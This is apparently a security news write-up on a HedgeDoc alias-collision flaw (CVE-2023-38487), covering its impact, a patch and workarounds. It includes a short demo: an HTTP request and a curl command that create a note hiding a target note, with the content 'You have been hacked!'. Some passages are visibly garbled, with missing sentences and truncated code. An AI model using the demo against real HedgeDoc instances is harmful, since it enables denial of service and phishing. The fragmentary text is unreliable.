CVE CyberSecurity Database News

CVE-2023-38487 - HedgeDoc “Note Hiding” Exploit—How Alias Collisions Can Block Access, Enable Phishing, and Denial of Service

Poster -

Summary:
CVE-2023-38487 exposes a subtle but impactful vulnerability in HedgeDoc, the collaborative markdown note-taking tool. Before version 1.9.9, misuse of its freeURL feature allowed users to “hide” any note (with a known ID) simply by creating a new note whose alias matches the target note’s ID. This could deny access to the real note or be used to trick users with malicious content. Here’s a closer look—what’s going on, why it happens, how attackers exploit it, and how you can stop it.

What Is HedgeDoc?

HedgeDoc is an open-source markdown editor, focused on collaborative, real-time editing—think Google Docs for markdown. Notes are usually accessed by their unique “note ID,” but HedgeDoc lets you create easier-to-remember “aliases” for direct access, thanks to its optional *freeURL* mode.

FreeURL means you can create new notes by picking whatever alias you want (like /new/my-cool-alias). But—previous to v1.9.9—a dangerous oversight existed.

If a user creates a new note, they can choose any “alias.”

- In freeURL mode, HedgeDoc does not check if the requested alias matches an ID of an existing note.

The *attacker’s new note*, whose alias is also "abc123".

- If someone tries to visit /abc123, HedgeDoc checks for an alias first. So it serves the attacker’s version—not the original.

Real-World Exploitation

- Denial of Service: Prevent everyone from reading the true note; only see the attacker’s version.
- Phishing/Trickery: Replace links, content, or attachments—users think it’s the real note.
- Persistence: Since no data is lost, but hidden, restoring from backup or editing the note won’t fix the problem.

Warning: Attackers need to *know or guess* the ID of the note to target it, but in some cases these aren’t too hard to predict or find.

Exploit—Step-by-Step Demo

Let’s say we have an important document with ID secretnote. We want to block everyone from accessing it (or show a fake version).

`http

POST /new/secretnote HTTP/1.1

Host: hedgedoc.example.com

Content-Type: application/json

[ ... authentication headers if required ... ]

{

"content": "You have been hacked!"

}

`bash

curl -X POST "https://hedgedoc.example.com/new/secretnote" \
-H "Content-Type: application/json" \

`

3. Now, visiting /secretnote brings up the attacker's note.
4. The original content in secretnote is hidden, unless you query it directly via a REST API bypassing alias logic (not generally possible from the web UI).

Dangers & Impact

- Who can attack? If freeURL is open to everyone, *anyone* can do this. If it’s restricted, only signed-in users.

Patch & Mitigation

- Fixed: Released in HedgeDoc v1.9.9 (July 2023)
- How fixed? The app now checks if your chosen alias matches an existing note ID. If so, it blocks the request:

`js

// (Pseudocode representing the check)

return HTTP_400_BAD_REQUEST;

}

`

See commit diff

Temporary Workarounds (older versions):

- Disable freeURL mode (set allowFreeURL/CMD_ALLOW_FREEURL to false)
- Restrict note creation: Require login for freeURL note creation with requireFreeURLAuthentication or CMD_REQUIRE_FREEURL_AUTHENTICATION=true

References

- GitHub Security Advisory: GHSA-37jr-j9c3-w2f2
- HedgeDoc release v1.9.9
- CVE-2023-38487 on MITRE

Conclusion

CVE-2023-38487 is a classic example of how “minor” logic bugs—like not checking for alias collisions—can have serious consequences, from stealthy DoS to social engineering attacks. If you use HedgeDoc, update to v1.9.9 or later now, and review your freeURL settings! If you run an open instance, consider restricting note creation to trusted users.

Stay secure, and don’t let your notes get hijacked!

*Exclusive Security Write-Up by [YourName].*
For more hands-on HedgeDoc and real-world CVE walkthroughs, [follow me here]!

Timeline

Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/10/2023 16:55:00 UTC